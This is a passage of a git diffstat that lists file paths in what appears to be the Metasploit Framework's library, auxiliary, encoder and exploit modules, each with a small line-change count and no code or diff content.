lib/rex/proto/smb/simpleclient.rb | 2 +- lib/rex/proto/smb/simpleclient.rb.ut.rb | 2 +- lib/rex/proto/smb/utils.rb | 2 +- lib/rex/proto/smb/utils.rb.ut.rb | 2 +- lib/rex/proto/sunrpc.rb | 2 +- lib/rex/proto/sunrpc/client.rb | 2 +- lib/rex/proto/sunrpc/xdr.rb | 2 +- lib/rex/script.rb | 2 +- lib/rex/service.rb | 2 +- lib/rex/service_manager.rb | 2 +- lib/rex/service_manager.rb.ut.rb | 2 +- lib/rex/services/local_relay.rb | 2 +- lib/rex/socket.rb | 2 +- lib/rex/socket.rb.ut.rb | 2 +- lib/rex/socket/comm.rb | 3 +-- lib/rex/socket/comm/local.rb | 2 +- lib/rex/socket/comm/local.rb.ut.rb | 2 +- lib/rex/socket/ip.rb | 2 +- lib/rex/socket/parameters.rb | 2 +- lib/rex/socket/parameters.rb.ut.rb | 2 +- lib/rex/socket/range_walker.rb | 2 +- lib/rex/socket/range_walker.rb.ut.rb | 2 +- lib/rex/socket/ssl_tcp.rb | 2 +- lib/rex/socket/ssl_tcp.rb.ut.rb | 2 +- lib/rex/socket/ssl_tcp_server.rb | 2 +- lib/rex/socket/ssl_tcp_server.rb.ut.rb | 2 +- lib/rex/socket/subnet_walker.rb | 2 +- lib/rex/socket/subnet_walker.rb.ut.rb | 2 +- lib/rex/socket/switch_board.rb | 2 +- lib/rex/socket/switch_board.rb.ut.rb | 2 +- lib/rex/socket/tcp.rb | 2 +- lib/rex/socket/tcp.rb.ut.rb | 2 +- lib/rex/socket/tcp_server.rb | 2 +- lib/rex/socket/tcp_server.rb.ut.rb | 2 +- lib/rex/socket/udp.rb | 2 +- lib/rex/socket/udp.rb.ut.rb | 2 +- lib/rex/struct2.rb | 2 +- lib/rex/struct2/c_struct.rb | 2 +- lib/rex/struct2/c_struct_template.rb | 2 +- lib/rex/struct2/constant.rb | 2 +- lib/rex/struct2/element.rb | 2 +- lib/rex/struct2/generic.rb | 2 +- lib/rex/struct2/restraint.rb | 2 +- lib/rex/struct2/s_string.rb | 2 +- lib/rex/struct2/s_struct.rb | 2 +- lib/rex/sync.rb | 2 +- lib/rex/sync/event.rb | 2 +- lib/rex/sync/read_write_lock.rb | 2 +- lib/rex/sync/ref.rb | 2 +- lib/rex/sync/thread_safe.rb | 2 +- lib/rex/test.rb | 2 +- lib/rex/text.rb | 2 +- lib/rex/text.rb.ut.rb | 2 +- lib/rex/time.rb | 3 +-- lib/rex/transformer.rb | 2 +- lib/rex/transformer.rb.ut.rb | 2 +- lib/rex/ui.rb | 2 +- lib/rex/ui/interactive.rb | 2 +- lib/rex/ui/output.rb | 2 +- lib/rex/ui/output/none.rb | 2 +- lib/rex/ui/progress_tracker.rb | 2 +- lib/rex/ui/subscriber.rb | 2 +- lib/rex/ui/text/color.rb | 2 +- lib/rex/ui/text/color.rb.ut.rb | 2 +- lib/rex/ui/text/dispatcher_shell.rb | 2 +- lib/rex/ui/text/input.rb | 2 +- lib/rex/ui/text/input/buffer.rb | 2 +- lib/rex/ui/text/input/readline.rb | 2 +- lib/rex/ui/text/input/socket.rb | 2 +- lib/rex/ui/text/input/stdio.rb | 2 +- lib/rex/ui/text/irb_shell.rb | 2 +- lib/rex/ui/text/output.rb | 2 +- lib/rex/ui/text/output/buffer.rb | 2 +- lib/rex/ui/text/output/socket.rb | 2 +- lib/rex/ui/text/output/stdio.rb | 2 +- lib/rex/ui/text/progress_tracker.rb | 2 +- lib/rex/ui/text/progress_tracker.rb.ut.rb | 2 +- lib/rex/ui/text/shell.rb | 2 +- lib/rex/ui/text/table.rb | 2 +- lib/rex/ui/text/table.rb.ut.rb | 2 +- lib/scruby.rb | 3 +-- lib/scruby/conf.rb | 2 +- lib/scruby/const.rb | 2 +- lib/scruby/deps.rb | 2 +- lib/scruby/dissector.rb | 2 +- lib/scruby/field.rb | 2 +- lib/scruby/func.rb | 2 +- lib/scruby/help.rb | 2 +- lib/scruby/layer.rb | 2 +- lib/scruby/packet.rb | 2 +- lib/scruby/unittest.rb | 2 +- lib/zip/ioextras.rb | 2 +- lib/zip/stdrubyext.rb | 2 +- lib/zip/tempfile_bugfixed.rb | 2 +- lib/zip/zip.rb | 2 +- lib/zip/zipfilesystem.rb | 2 +- lib/zip/ziprequire.rb | 2 +- modules/auxiliary/admin/backupexec/dump.rb | 3 +-- modules/auxiliary/admin/backupexec/registry.rb | 3 +-- .../auxiliary/admin/cisco/ios_http_auth_bypass.rb | 2 +- .../admin/emc/alphastor_devicemanager_exec.rb | 3 +-- .../admin/emc/alphastor_librarymanager_exec.rb | 3 +-- modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb | 3 +-- modules/auxiliary/admin/motorola/wr850g_cred.rb | 3 +-- modules/auxiliary/admin/ms/ms08_059_his2006.rb | 2 +- modules/auxiliary/admin/pop2/uw_fileretrieval.rb | 3 +-- modules/auxiliary/admin/serverprotect/file.rb | 3 +-- modules/auxiliary/admin/webmin/file_disclosure.rb | 3 +-- .../auxiliary/dos/cisco/ios_http_percentpercent.rb | 2 +- modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb | 3 +-- modules/auxiliary/dos/ftp/guildftp_cwdlist.rb | 3 +-- modules/auxiliary/dos/ftp/titan626_site.rb | 3 +-- modules/auxiliary/dos/ftp/xmeasy560_nlst.rb | 3 +-- modules/auxiliary/dos/http/webrick_regex.rb | 3 +-- modules/auxiliary/dos/samba/lsa_addprivs_heap.rb | 3 +-- modules/auxiliary/dos/samba/lsa_transnames_heap.rb | 3 +-- .../auxiliary/dos/solaris/lpd/cascade_delete.rb | 3 +-- modules/auxiliary/dos/windows/appian/appian_bpm.rb | 3 +-- .../auxiliary/dos/windows/ftp/winftp230_nlst.rb | 4 +--- modules/auxiliary/dos/windows/nat/nat_helper.rb | 3 +-- modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb | 3 +-- .../auxiliary/dos/windows/smb/ms06_035_mailslot.rb | 3 +-- .../auxiliary/dos/windows/smb/ms06_063_trans.rb | 3 +-- .../dos/windows/smb/rras_vls_null_deref.rb | 3 +-- .../dos/windows/smtp/ms06_019_exchange.rb | 3 +-- modules/auxiliary/dos/wireless/cts_rts_flood.rb | 4 +--- modules/auxiliary/dos/wireless/daringphucball.rb | 2 +- modules/auxiliary/dos/wireless/deauth.rb | 4 +--- modules/auxiliary/dos/wireless/fakeap.rb | 3 +-- modules/auxiliary/dos/wireless/fuzz_beacon.rb | 3 +-- modules/auxiliary/dos/wireless/fuzz_proberesp.rb | 3 +-- .../auxiliary/dos/wireless/netgear_ma521_rates.rb | 2 +- modules/auxiliary/dos/wireless/netgear_wg311pci.rb | 2 +- .../auxiliary/dos/wireless/probe_resp_null_ssid.rb | 3 +-- modules/auxiliary/dos/wireless/wifun.rb | 3 +-- modules/auxiliary/dos/wireshark/ldap.rb | 3 +-- .../auxiliary/scanner/dcerpc/endpoint_mapper.rb | 4 +--- modules/auxiliary/scanner/dcerpc/hidden.rb | 4 +--- modules/auxiliary/scanner/dcerpc/management.rb | 4 +--- modules/auxiliary/scanner/discovery/sweep_udp.rb | 3 +-- .../scanner/emc/alphastor_devicemanager.rb | 3 +-- .../scanner/emc/alphastor_librarymanager.rb | 3 +-- modules/auxiliary/scanner/ftp/anonymous.rb | 2 +- modules/auxiliary/scanner/http/frontpage.rb | 3 +-- modules/auxiliary/scanner/http/frontpage_login.rb | 3 +-- modules/auxiliary/scanner/http/lucky_punch.rb | 3 +-- modules/auxiliary/scanner/http/version.rb | 3 +-- modules/auxiliary/scanner/http/wmap_backup_file.rb | 3 +-- .../auxiliary/scanner/http/wmap_blind_sql_query.rb | 3 +-- modules/auxiliary/scanner/http/wmap_brute_dirs.rb | 2 +- modules/auxiliary/scanner/http/wmap_dir_listing.rb | 3 +-- modules/auxiliary/scanner/http/wmap_files_dir.rb | 3 +-- modules/auxiliary/scanner/http/wmap_replace_ext.rb | 3 +-- .../auxiliary/scanner/http/wmap_vhost_scanner.rb | 3 +-- modules/auxiliary/scanner/http/writable.rb | 3 +-- .../auxiliary/scanner/misc/ib_service_mgr_info.rb | 4 +--- modules/auxiliary/scanner/mssql/mssql_login.rb | 3 +-- modules/auxiliary/scanner/mssql/mssql_ping.rb | 3 +-- modules/auxiliary/scanner/portscan/tcp.rb | 2 +- modules/auxiliary/scanner/smb/pipe_auditor.rb | 3 +-- .../auxiliary/scanner/smb/pipe_dcerpc_auditor.rb | 4 +--- modules/auxiliary/scanner/smb/version.rb | 3 +-- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 2 +- modules/auxiliary/scanner/x11/open_x11.rb | 4 +--- modules/auxiliary/server/browser_autopwn.rb | 4 +--- modules/auxiliary/server/capture/ftp.rb | 3 +-- modules/auxiliary/server/capture/http.rb | 3 +-- modules/auxiliary/server/capture/imap.rb | 3 +-- modules/auxiliary/server/capture/pop3.rb | 3 +-- modules/auxiliary/server/capture/smb.rb | 3 +-- modules/auxiliary/server/capture/smtp.rb | 3 +-- modules/auxiliary/server/capture/telnet.rb | 3 +-- modules/auxiliary/server/dns/spoofhelper.rb | 3 +-- modules/auxiliary/server/fakedns.rb | 3 +-- modules/auxiliary/server/socks_unc.rb | 3 +-- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 3 +-- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 3 +-- modules/auxiliary/spoof/dns/compare_results.rb | 3 +-- modules/auxiliary/test/capture.rb | 4 +--- modules/auxiliary/test/ip_spoof.rb | 3 +-- modules/auxiliary/test/recon_passive.rb | 3 +-- modules/auxiliary/test/scanner_batch.rb | 3 +-- modules/auxiliary/test/scanner_host.rb | 3 +-- modules/auxiliary/test/scanner_range.rb | 3 +-- modules/auxiliary/voip/sip_invite_spoof.rb | 3 +-- modules/encoders/cmd/generic_sh.rb | 4 +--- modules/encoders/encoder_test.rb.ut.rb | 2 +- modules/encoders/generic/none.rb | 4 +--- modules/encoders/generic/none.rb.ut.rb | 2 +- modules/encoders/mipsbe/longxor.rb | 4 +--- modules/encoders/mipsle/longxor.rb | 4 +--- modules/encoders/php/base64.rb | 4 +--- modules/encoders/ppc/longxor.rb | 4 +--- modules/encoders/ppc/longxor_tag.rb | 4 +--- modules/encoders/sparc/longxor_tag.rb | 4 +--- modules/encoders/x86/alpha_mixed.rb | 4 +--- modules/encoders/x86/alpha_upper.rb | 4 +--- modules/encoders/x86/avoid_utf8_tolower.rb | 4 +--- modules/encoders/x86/call4_dword_xor.rb | 4 +--- modules/encoders/x86/call4_dword_xor.rb.ut.rb | 2 +- modules/encoders/x86/countdown.rb | 4 +--- modules/encoders/x86/countdown.rb.ut.rb | 2 +- modules/encoders/x86/fnstenv_mov.rb | 4 +--- modules/encoders/x86/fnstenv_mov.rb.ut.rb | 2 +- modules/encoders/x86/jmp_call_additive.rb | 4 +--- modules/encoders/x86/nonalpha.rb | 4 +--- modules/encoders/x86/nonupper.rb | 4 +--- modules/encoders/x86/shikata_ga_nai.rb | 4 +--- modules/encoders/x86/unicode_mixed.rb | 4 +--- modules/encoders/x86/unicode_upper.rb | 4 +--- .../exploits/bsdi/softcart/mercantec_softcart.rb | 3 +-- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 4 +--- modules/exploits/hpux/lpd/cleanup_exec.rb | 3 +-- modules/exploits/irix/lpd/tagprinter_exec.rb | 3 +-- modules/exploits/linux/games/ut2004_secure.rb | 3 +-- modules/exploits/linux/http/gpsd_format_string.rb | 3 +-- modules/exploits/linux/http/linksys_apply_cgi.rb | 3 +-- modules/exploits/linux/http/peercast_url.rb | 3 +-- modules/exploits/linux/ids/snortbopre.rb | 4 +--- modules/exploits/linux/imap/imap_uw_lsub.rb | 3 +-- .../exploits/linux/madwifi/madwifi_giwscan_cb.rb | 3 +-- modules/exploits/linux/misc/gld_postfix.rb | 5 +---- modules/exploits/linux/misc/ib_inet_connect.rb | 5 +---- .../exploits/linux/misc/ib_jrd8_create_database.rb | 5 +---- modules/exploits/linux/misc/ib_open_marker_file.rb | 5 +---- modules/exploits/linux/misc/ib_pwd_db_aliased.rb | 5 +---- modules/exploits/linux/mysql/mysql_yassl.rb | 3 +-- .../exploits/linux/pptp/poptop_negative_read.rb | 3 +-- .../linux/proxy/squid_ntlm_authenticate.rb | 3 +-- .../exploits/linux/samba/lsa_transnames_heap.rb | 3 +-- .../multi/browser/firefox_queryinterface.rb | 3 +-- .../exploits/multi/browser/mozilla_compareto.rb | 3 +-- .../multi/browser/mozilla_navigatorjava.rb | 3 +-- modules/exploits/multi/browser/qtjava_pointer.rb | 3 +-- modules/exploits/multi/handler.rb | 3 +-- modules/exploits/multi/ntp/ntp_overflow.rb | 4 +--- .../multi/php/php_unserialize_zval_cookie.rb | 3 +-- modules/exploits/multi/realserver/describe.rb | 4 +--- modules/exploits/multi/samba/nttrans.rb | 3 +-- modules/exploits/multi/svn/svnserve_date.rb | 4 +--- modules/exploits/netware/smb/lsass_cifs.rb | 3 +-- modules/exploits/osx/afp/loginext.rb | 4 +--- modules/exploits/osx/arkeia/type77.rb | 3 +-- modules/exploits/osx/armle/safari_libtiff.rb | 3 +-- modules/exploits/osx/browser/safari_libtiff.rb | 3 +-- .../osx/browser/safari_metadata_archive.rb | 3 +-- modules/exploits/osx/browser/software_update.rb | 3 +-- modules/exploits/osx/email/mailapp_image_exec.rb | 4 +--- modules/exploits/osx/email/mobilemail_libtiff.rb | 4 +--- modules/exploits/osx/ftp/webstar_ftp_user.rb | 3 +-- modules/exploits/osx/samba/lsa_transnames_heap.rb | 3 +-- modules/exploits/osx/samba/trans2open.rb | 3 +-- modules/exploits/solaris/dtspcd/heap_noir.rb | 3 +-- modules/exploits/solaris/lpd/sendmail_exec.rb | 3 +-- .../exploits/solaris/samba/lsa_transnames_heap.rb | 3 +-- modules/exploits/solaris/samba/trans2open.rb | 3 +-- .../solaris/sunrpc/sadmind_adm_build_path.rb | 2 +- modules/exploits/solaris/sunrpc/sadmind_exec.rb | 3 +-- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 3 +-- modules/exploits/solaris/telnet/fuser.rb | 3 +-- modules/exploits/solaris/telnet/ttyprompt.rb | 3 +-- modules/exploits/test/aggressive.rb | 6 +----- modules/exploits/test/exploitme.rb | 6 +----- modules/exploits/test/kernel.rb | 6 +----- modules/exploits/unix/misc/distcc_exec.rb | 3 +-- .../exploits/unix/misc/openview_omniback_exec.rb | 3 +-- modules/exploits/unix/misc/spamassassin_exec.rb | 3 +-- .../exploits/unix/smtp/clamav_milter_blackhole.rb | 3 +-- .../exploits/unix/webapp/awstats_configdir_exec.rb | 4 +--- modules/exploits/unix/webapp/barracuda_img_exec.rb | 3 +-- .../exploits/unix/webapp/cacti_graphimage_exec.rb | 3 +-- .../unix/webapp/google_proxystylesheet_exec.rb | 3 +-- modules/exploits/unix/webapp/guestbook_ssi_exec.rb | 3 +-- .../unix/webapp/openview_connectednodes_exec.rb | 3 +-- modules/exploits/unix/webapp/pajax_remote_exec.rb | 3 +-- modules/exploits/unix/webapp/php_eval.rb | 2 +- modules/exploits/unix/webapp/php_include.rb | 3 +-- .../exploits/unix/webapp/php_vbulletin_template.rb | 3 +-- .../exploits/unix/webapp/php_wordpress_lastpost.rb | 3 +-- modules/exploits/unix/webapp/php_xmlrpc_eval.rb | 3 +-- modules/exploits/unix/webapp/phpbb_highlight.rb | 5 +---- .../exploits/unix/webapp/sphpblog_file_upload.rb | 3 +-- .../unix/webapp/squirrelmail_pgp_plugin.rb | 6 +----- .../exploits/windows/antivirus/symantec_rtvscan.rb | 3 +-- .../windows/antivirus/trendmicro_serverprotect.rb | 3 +-- .../trendmicro_serverprotect_createbinding.rb | 3 +-- .../trendmicro_serverprotect_earthagent.rb | 3 +-- modules/exploits/windows/arkeia/type77.rb | 3 +-- .../exploits/windows/backupexec/name_service.rb | 2 +- .../exploits/windows/backupexec/remote_agent.rb | 3 +-- .../exploits/windows/brightstor/discovery_tcp.rb | 3 +-- .../exploits/windows/brightstor/discovery_udp.rb | 3 +-- .../windows/brightstor/etrust_itm_alert.rb | 2 +- modules/exploits/windows/brightstor/hsmserver.rb | 3 +-- modules/exploits/windows/brightstor/lgserver.rb | 3 +-- .../windows/brightstor/lgserver_rxrlogin.rb | 3 +-- .../brightstor/lgserver_rxsuselicenseini.rb | 3 +-- .../exploits/windows/brightstor/mediasrv_sunrpc.rb | 3 +-- .../exploits/windows/brightstor/message_engine.rb | 3 +-- .../windows/brightstor/message_engine_heap.rb | 3 +-- modules/exploits/windows/brightstor/sql_agent.rb | 3 +-- modules/exploits/windows/brightstor/tape_engine.rb | 3 +-- .../exploits/windows/brightstor/universal_agent.rb | 2 +- modules/exploits/windows/browser/aim_goaway.rb | 4 +--- .../windows/browser/ani_loadimage_chunksize.rb | 3 +-- .../windows/browser/apple_itunes_playlist.rb | 3 +-- .../windows/browser/apple_quicktime_rtsp.rb | 3 +-- .../exploits/windows/browser/ask_shortformat.rb | 3 +-- .../browser/bearshare_setformatlikesample.rb | 3 +-- .../browser/creative_software_cachefolder.rb | 4 +--- .../browser/enjoysapgui_preparetoposthtml.rb | 3 +-- .../windows/browser/facebook_extractiptc.rb | 3 +-- modules/exploits/windows/browser/gom_openurl.rb | 3 +-- modules/exploits/windows/browser/hploadrunner.rb | 3 +-- .../exploits/windows/browser/hpmqc_progcolor.rb | 3 +-- .../browser/ibmlotusdomino_dwa_uploadmodule.rb | 3 +-- .../exploits/windows/browser/ie_createobject.rb | 4 +--- .../windows/browser/ie_iscomponentinstalled.rb | 4 +--- .../exploits/windows/browser/kazaa_altnet_heap.rb | 3 +-- .../windows/browser/logitechvideocall_start.rb | 3 +-- modules/exploits/windows/browser/lpviewer_url.rb | 3 +-- .../browser/macrovision_downloadandexecute.rb | 3 +-- .../exploits/windows/browser/macrovision_unsafe.rb | 3 +-- .../windows/browser/mcafee_mcsubmgr_vsprintf.rb | 4 +--- .../browser/mcafeevisualtrace_tracetarget.rb | 3 +-- modules/exploits/windows/browser/mirc_irc_url.rb | 3 +-- .../windows/browser/ms03_020_ie_objecttype.rb | 4 +--- .../windows/browser/ms06_001_wmf_setabortproc.rb | 4 +--- .../windows/browser/ms06_013_createtextrange.rb | 4 +--- .../windows/browser/ms06_055_vml_method.rb | 4 +--- .../windows/browser/ms06_057_webview_setslice.rb | 4 +--- .../exploits/windows/browser/ms06_067_keyframe.rb | 4 +--- .../exploits/windows/browser/ms06_071_xml_core.rb | 4 +--- .../windows/browser/ms08_041_snapshotviewer.rb | 3 +-- .../windows/browser/ms08_053_mediaencoder.rb | 3 +-- modules/exploits/windows/browser/nis2004_get.rb | 3 +-- .../windows/browser/novelliprint_executerequest.rb | 3 +-- .../browser/novelliprint_getdriversettings.rb | 3 +-- .../exploits/windows/browser/realplayer_console.rb | 3 +-- .../exploits/windows/browser/realplayer_import.rb | 3 +-- .../exploits/windows/browser/realplayer_smil.rb | 3 +-- .../windows/browser/softartisans_getdrivename.rb | 3 +-- .../windows/browser/sonicwall_addrouteentry.rb | 3 +-- .../browser/symantec_backupexec_pvcalendar.rb | 3 +-- .../browser/systemrequirementslab_unsafe.rb | 2 +- .../windows/browser/trendmicro_officescan.rb | 3 +-- .../windows/browser/tumbleweed_filetransfer.rb | 4 +--- .../windows/browser/winamp_playlist_unc.rb | 3 +-- .../exploits/windows/browser/winamp_ultravox.rb | 2 +- .../windows/browser/windvd7_applicationtype.rb | 3 +-- modules/exploits/windows/browser/xmplay_asx.rb | 3 +-- .../windows/browser/yahoomessenger_fvcom.rb | 3 +-- .../windows/browser/yahoomessenger_server.rb | 3 +-- .../browser/zenturiprogramchecker_unsafe.rb | 2 +- modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 5 +---- modules/exploits/windows/dcerpc/ms05_017_msmq.rb | 3 +-- modules/exploits/windows/dcerpc/ms07_065_msmq.rb | 3 +-- modules/exploits/windows/dcerpc/msdns_zonename.rb | 3 +-- .../exploits/windows/driver/broadcom_wifi_ssid.rb | 3 +-- .../exploits/windows/driver/dlink_wifi_rates.rb | 3 +-- .../windows/driver/netgear_wg111_beacon.rb | 3 +-- .../windows/email/ani_loadimage_chunksize.rb | 4 +--- modules/exploits/windows/emc/alphastor_agent.rb | 3 +-- .../exploits/windows/firewall/blackice_pam_icq.rb | 3 +-- modules/exploits/windows/firewall/kerio_auth.rb | 3 +-- modules/exploits/windows/ftp/3cdaemon_ftp_user.rb | 4 +--- modules/exploits/windows/ftp/cesarftp_mkd.rb | 3 +-- modules/exploits/windows/ftp/dreamftp_format.rb | 3 +-- .../exploits/windows/ftp/easyfilesharing_pass.rb | 3 +-- .../exploits/windows/ftp/filecopa_list_overflow.rb | 3 +-- .../exploits/windows/ftp/freeftpd_key_exchange.rb | 3 +-- modules/exploits/windows/ftp/freeftpd_user.rb | 3 +-- .../exploits/windows/ftp/globalscapeftp_input.rb | 3 +-- modules/exploits/windows/ftp/leapftp_pasv_reply.rb | 4 +--- .../exploits/windows/ftp/netterm_netftpd_user.rb | 3 +-- .../exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb | 3 +-- .../windows/ftp/oracle9i_xdb_ftp_unlock.rb | 3 +-- modules/exploits/windows/ftp/sami_ftpd_user.rb | 3 +-- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 3 +-- modules/exploits/windows/ftp/servu_mdtm.rb | 3 +-- .../exploits/windows/ftp/slimftpd_list_concat.rb | 3 +-- modules/exploits/windows/ftp/warftpd_165_pass.rb | 4 +--- modules/exploits/windows/ftp/warftpd_165_user.rb | 4 +--- modules/exploits/windows/ftp/wftpd_size.rb | 3 +-- .../exploits/windows/ftp/wsftp_server_503_mkd.rb | 3 +-- .../exploits/windows/ftp/wsftp_server_505_xmd5.rb | 3 +-- modules/exploits/windows/games/mohaa_getinfo.rb | 2 +- modules/exploits/windows/games/ut2004_secure.rb | 3 +-- modules/exploits/windows/http/altn_webadmin.rb | 3 +-- modules/exploits/windows/http/apache_chunked.rb | 3 +-- .../exploits/windows/http/apache_modjk_overflow.rb | 4 +--- .../exploits/windows/http/badblue_ext_overflow.rb | 3 +-- modules/exploits/windows/http/badblue_passthru.rb | 3 +-- modules/exploits/windows/http/ca_igateway_debug.rb | 4 +--- modules/exploits/windows/http/edirectory_host.rb | 3 +-- .../exploits/windows/http/edirectory_imonitor.rb | 3 +-- modules/exploits/windows/http/hp_nnm.rb | 3 +-- modules/exploits/windows/http/ia_webmail.rb | 3 +-- .../exploits/windows/http/ibm_tpmfosd_overflow.rb | 3 +-- modules/exploits/windows/http/ibm_tsm_cad.rb | 3 +-- modules/exploits/windows/http/icecast_header.rb | 3 +-- .../windows/http/ipswitch_wug_maincfgret.rb | 3 +-- .../windows/http/mailenable_auth_header.rb | 3 +-- .../exploits/windows/http/maxdb_webdbm_database.rb | 3 +-- .../windows/http/maxdb_webdbm_get_overflow.rb | 3 +-- .../exploits/windows/http/mcafee_epolicy_source.rb | 4 +--- .../windows/http/minishare_get_overflow.rb | 3 +-- .../exploits/windows/http/navicopa_get_overflow.rb | 3 +-- .../windows/http/novell_messenger_acceptlang.rb | 3 +-- modules/exploits/windows/http/nowsms.rb | 3 +-- modules/exploits/windows/http/oracle9i_xdb_pass.rb | 3 +-- modules/exploits/windows/http/peercast_url.rb | 3 +-- .../exploits/windows/http/privatewire_gateway.rb | 3 +-- .../exploits/windows/http/psoproxy91_overflow.rb | 4 +--- modules/exploits/windows/http/sapdb_webtools.rb | 3 +-- .../exploits/windows/http/savant_31_overflow.rb | 4 +--- modules/exploits/windows/http/shoutcast_format.rb | 3 +-- modules/exploits/windows/http/shttpd_post.rb | 3 +-- modules/exploits/windows/http/sybase_easerver.rb | 3 +-- .../windows/http/trackercam_phparg_overflow.rb | 3 +-- .../exploits/windows/http/trendmicro_officescan.rb | 3 +-- .../exploits/windows/http/xitami_if_mod_since.rb | 4 +--- modules/exploits/windows/iis/ms01_023_printer.rb | 3 +-- modules/exploits/windows/iis/ms01_033_idq.rb | 3 +-- modules/exploits/windows/iis/ms02_018_htr.rb | 3 +-- .../exploits/windows/iis/ms03_007_ntdll_webdav.rb | 3 +-- modules/exploits/windows/imap/eudora_list.rb | 3 +-- modules/exploits/windows/imap/imail_delete.rb | 3 +-- modules/exploits/windows/imap/ipswitch_search.rb | 3 +-- modules/exploits/windows/imap/mailenable_login.rb | 3 +-- modules/exploits/windows/imap/mailenable_status.rb | 3 +-- .../exploits/windows/imap/mailenable_w3c_select.rb | 3 +-- modules/exploits/windows/imap/mdaemon_cram_md5.rb | 3 +-- modules/exploits/windows/imap/mdaemon_fetch.rb | 4 +--- .../windows/imap/mercur_imap_select_overflow.rb | 3 +-- modules/exploits/windows/imap/mercur_login.rb | 3 +-- modules/exploits/windows/imap/mercury_login.rb | 3 +-- modules/exploits/windows/imap/mercury_rename.rb | 3 +-- .../exploits/windows/imap/novell_netmail_append.rb | 3 +-- .../exploits/windows/imap/novell_netmail_auth.rb | 3 +-- .../exploits/windows/imap/novell_netmail_status.rb | 3 +-- .../windows/imap/novell_netmail_subscribe.rb | 3 +-- modules/exploits/windows/isapi/fp30reg_chunked.rb | 3 +-- .../exploits/windows/isapi/ms00_094_pbserver.rb | 3 +-- modules/exploits/windows/isapi/nsiislog_post.rb | 3 +-- .../windows/isapi/rsa_webagent_redirect.rb | 3 +-- modules/exploits/windows/isapi/w3who_query.rb | 3 +-- modules/exploits/windows/ldap/imail_thc.rb | 3 +-- .../exploits/windows/license/sentinel_lm7_udp.rb | 3 +-- modules/exploits/windows/lpd/hummingbird_exceed.rb | 3 +-- modules/exploits/windows/lpd/niprint.rb | 3 +-- modules/exploits/windows/lpd/saplpd.rb | 3 +-- modules/exploits/windows/lpd/wincomlpd_admin.rb | 3 +-- .../windows/misc/apple_quicktime_rtsp_response.rb | 3 +-- .../windows/misc/asus_dpcproxy_overflow.rb | 3 +-- .../exploits/windows/misc/bakbone_netvault_heap.rb | 3 +-- modules/exploits/windows/misc/bigant_server.rb | 3 +-- .../exploits/windows/misc/bomberclone_overflow.rb | 3 +-- modules/exploits/windows/misc/borland_interbase.rb | 3 +-- modules/exploits/windows/misc/borland_starteam.rb | 3 +-- modules/exploits/windows/misc/doubletake.rb | 3 +-- modules/exploits/windows/misc/eiqnetworks_esa.rb | 3 +-- .../windows/misc/eiqnetworks_esa_topology.rb | 3 +-- .../windows/misc/fb_isc_attach_database.rb | 4 +--- .../windows/misc/fb_isc_create_database.rb | 4 +--- modules/exploits/windows/misc/fb_svc_attach.rb | 4 +--- modules/exploits/windows/misc/hp_ovtrace.rb | 3 +-- .../windows/misc/ib_isc_attach_database.rb | 4 +--- .../windows/misc/ib_isc_create_database.rb | 4 +--- modules/exploits/windows/misc/ib_svc_attach.rb | 4 +--- modules/exploits/windows/misc/landesk_aolnsrvr.rb | 3 +-- modules/exploits/windows/misc/mercury_phonebook.rb | 3 +-- modules/exploits/windows/misc/ms07_064_sami.rb | 3 +-- modules/exploits/windows/misc/netcat110_nt.rb | 4 +--- modules/exploits/windows/misc/shixxnote_font.rb | 3 +-- .../exploits/windows/misc/tiny_identd_overflow.rb | 3 +-- modules/exploits/windows/misc/windows_rsh.rb | 3 +-- modules/exploits/windows/mssql/ms02_039_slammer.rb | 3 +-- modules/exploits/windows/mssql/ms02_056_hello.rb | 3 +-- modules/exploits/windows/mysql/mysql_yassl.rb | 3 +-- modules/exploits/windows/nntp/ms05_030_nntp.rb | 3 +-- .../windows/novell/groupwisemessenger_client.rb | 3 +-- modules/exploits/windows/novell/nmap_stor.rb | 3 +-- .../windows/novell/zenworks_desktop_agent.rb | 3 +-- modules/exploits/windows/pop3/seattlelab_pass.rb | 3 +-- .../windows/proxy/bluecoat_winproxy_host.rb | 3 +-- .../exploits/windows/proxy/ccproxy_telnet_ping.rb | 3 +-- .../exploits/windows/proxy/proxypro_http_get.rb | 3 +-- modules/exploits/windows/scada/realwin.rb | 3 +-- modules/exploits/windows/sip/aim_triton_cseq.rb | 3 +-- modules/exploits/windows/sip/sipxezphone_cseq.rb | 3 +-- modules/exploits/windows/sip/sipxphone_cseq.rb | 3 +-- modules/exploits/windows/smb/ms03_049_netapi.rb | 3 +-- modules/exploits/windows/smb/ms04_007_killbill.rb | 3 +-- modules/exploits/windows/smb/ms04_011_lsass.rb | 4 +--- modules/exploits/windows/smb/ms04_031_netdde.rb | 3 +-- modules/exploits/windows/smb/ms05_039_pnp.rb | 3 +-- .../exploits/windows/smb/ms06_025_rasmans_reg.rb | 3 +-- modules/exploits/windows/smb/ms06_025_rras.rb | 3 +-- modules/exploits/windows/smb/ms06_040_netapi.rb | 3 +-- modules/exploits/windows/smb/ms06_066_nwapi.rb | 3 +-- modules/exploits/windows/smb/ms06_066_nwwks.rb | 3 +-- modules/exploits/windows/smb/msdns_zonename.rb | 3 +-- modules/exploits/windows/smb/psexec.rb | 3 +-- modules/exploits/windows/smb/smb_relay.rb | 4 +--- .../exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 3 +-- modules/exploits/windows/smtp/mercury_cram_md5.rb | 3 +-- modules/exploits/windows/smtp/wmailserver.rb | 3 +-- modules/exploits/windows/smtp/ypops_overflow1.rb | 3 +-- .../exploits/windows/ssh/freesshd_key_exchange.rb | 3 +-- modules/exploits/windows/ssh/putty_msg_debug.rb | 4 +--- modules/exploits/windows/ssh/securecrt_ssh1.rb | 4 +--- modules/exploits/windows/ssl/ms04_011_pct.rb | 3 +-- .../windows/telnet/gamsoft_telsrv_username.rb | 4 +--- modules/exploits/windows/telnet/goodtech_telnet.rb | 3 +-- .../exploits/windows/tftp/attftp_long_filename.rb | 3 +-- .../windows/tftp/futuresoft_transfermode.rb | 3 +-- 